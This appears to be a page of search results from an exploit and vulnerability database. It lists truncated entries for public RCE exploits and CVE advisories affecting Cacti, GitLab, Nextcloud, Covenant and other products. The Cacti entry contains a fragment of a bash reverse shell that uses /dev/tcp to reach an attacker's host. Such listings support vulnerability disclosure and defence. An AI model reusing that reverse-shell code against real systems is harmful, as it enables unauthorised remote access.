11234 matches found
Exploit for Incorrect Authorization in Cacti
CVE-2022-46169 unaut...
GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)
Exploit Title: GitLab v15.3 - Remote Code Execution RCE Authenticated Date: 2022-12-25 Exploit Author: Antonio Francesco Sardella Vendor Homepage: https://about.gitlab.com/ Software Link: https://about.gitlab.com/install/ Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to...
AD Manager Plus 7122 - Remote Code Execution (RCE)
Exploit Title: AD Manager Plus 7122 - Remote Code Execution RCE Exploit Author: Chan Nyein Wai & Thura Moe Myint Vendor Homepage: https://www.manageengine.com/products/ad-manager/ Software Link: https://www.manageengine.com/products/ad-manager/download.html Version: Ad Manager Plus Before 7122...
Metasploit Weekly Wrap-up
Windows 11 ADF WinSock Priv Esc The new windows/local/cve202321768afdlpe exploit makes use of a brand new Windows kernel exploitation technique that leverages the new I/O ring feature introduced in Windows 11 21H2. This technique comes from Yarden Shafir research and provides a full read/write...
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution Vulnerability
Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution RCE Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First...
Judging Management System v1.0 - Remote Code Execution Exploit
Exploit Title: Judging Management System v1.0 - Remote Code Execution RCE Exploit Author: Angelo Pio Amirante Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html Version: 1.0...
Cacti v1.2.22 - Remote Command Execution (RCE)
Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Discovery Date: 2022-12-08 Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE)
Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution RCE Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First...
CVE-2023-26482
Nextcloud server is an open source home cloud implementation. In affected versions a missing scope validation allowed users to create workflows which are designed to be only available for administrators. Some workflows are designed to be RCE by invoking defined scripts, in order to generate PDFs,...
Design/Logic Flaw
Nextcloud server is an open source home cloud implementation. In affected versions a missing scope validation allowed users to create workflows which are designed to be only available for administrators. Some workflows are designed to be RCE by invoking defined scripts, in order to generate PDFs,...
CVE-2023-26482 Scope of workflow operations is not validated in nextcloud server
Nextcloud server is an open source home cloud implementation. In affected versions a missing scope validation allowed users to create workflows which are designed to be only available for administrators. Some workflows are designed to be RCE by invoking defined scripts, in order to generate PDFs,...
CVE-2023-26482 Scope of workflow operations is not validated in nextcloud server
Nextcloud server is an open source home cloud implementation. In affected versions a missing scope validation allowed users to create workflows which are designed to be only available for administrators. Some workflows are designed to be RCE by invoking defined scripts, in order to generate PDFs,...
CVE-2023-26482
CVE-2023-26482 affects Nextcloud Server (24.x prior to 24.0.10 and 25.x prior to 25.0.4 in several sources). The issue is a missing scope validation for Workflow operations, allowing creation of workflows intended for admins to be usable by non-admin contexts and, in combination with certain apps...
CVE-2023-28731 Unauthenticated RCE affecting the AcyMailing plugin for Joomla
AnyMailing Joomla Plugin is vulnerable to unauthenticated remote code execution, when being granted access to the campaign's creation on front-office due to unrestricted file upload allowing PHP code to be injected. This issue affects AnyMailing Joomla Plugin Enterprise in versions below 8.3.0...
CVE-2023-28935 Apache UIMA DUCC: DUCC (EOL) allows RCE
UNSUPPORTED WHEN ASSIGNED Improper Neutralization of Special Elements used in a Command 'Command Injection' vulnerability in Apache Software Foundation Apache UIMA DUCC. When using the "Distributed UIMA Cluster Computing" DUCC module of Apache UIMA, an authenticated user that has the permissions ...
CVE-2023-28935 Apache UIMA DUCC: DUCC (EOL) allows RCE
UNSUPPORTED WHEN ASSIGNED Improper Neutralization of Special Elements used in a Command 'Command Injection' vulnerability in Apache Software Foundation Apache UIMA DUCC. When using the "Distributed UIMA Cluster Computing" DUCC module of Apache UIMA, an authenticated user that has the permissions ...
Scope of workflow operations is not validated
None...
Covenant 0.5 Remote Code Execution
Exploit Title: Covenant v0.5 - Remote Code Execution RCE Exploit Author: xThaz Author website: https://xthaz.fr/ Date: 2022-09-11 Vendor Homepage: https://cobbr.io/Covenant.html Software Link: https://github.com/cobbr/Covenant Version: v0.1.3 - v0.5 Tested on: Windows 11 compiled covenant Windows...
Covenant v0.5 - Remote Code Execution (RCE)
Exploit Title: Covenant v0.5 - Remote Code Execution RCE Exploit Author: xThaz Author website: https://xthaz.fr/ Date: 2022-09-11 Vendor Homepage: https://cobbr.io/Covenant.html Software Link: https://github.com/cobbr/Covenant Version: v0.1.3 - v0.5 Tested on: Windows 11 compiled covenant Windows...
RHEL 8 : Red Hat JBoss Enterprise Application Platform 7.4.10 on RHEL 8 (RHSA-2023:1513)
The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2023:1513 advisory. Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. This release o...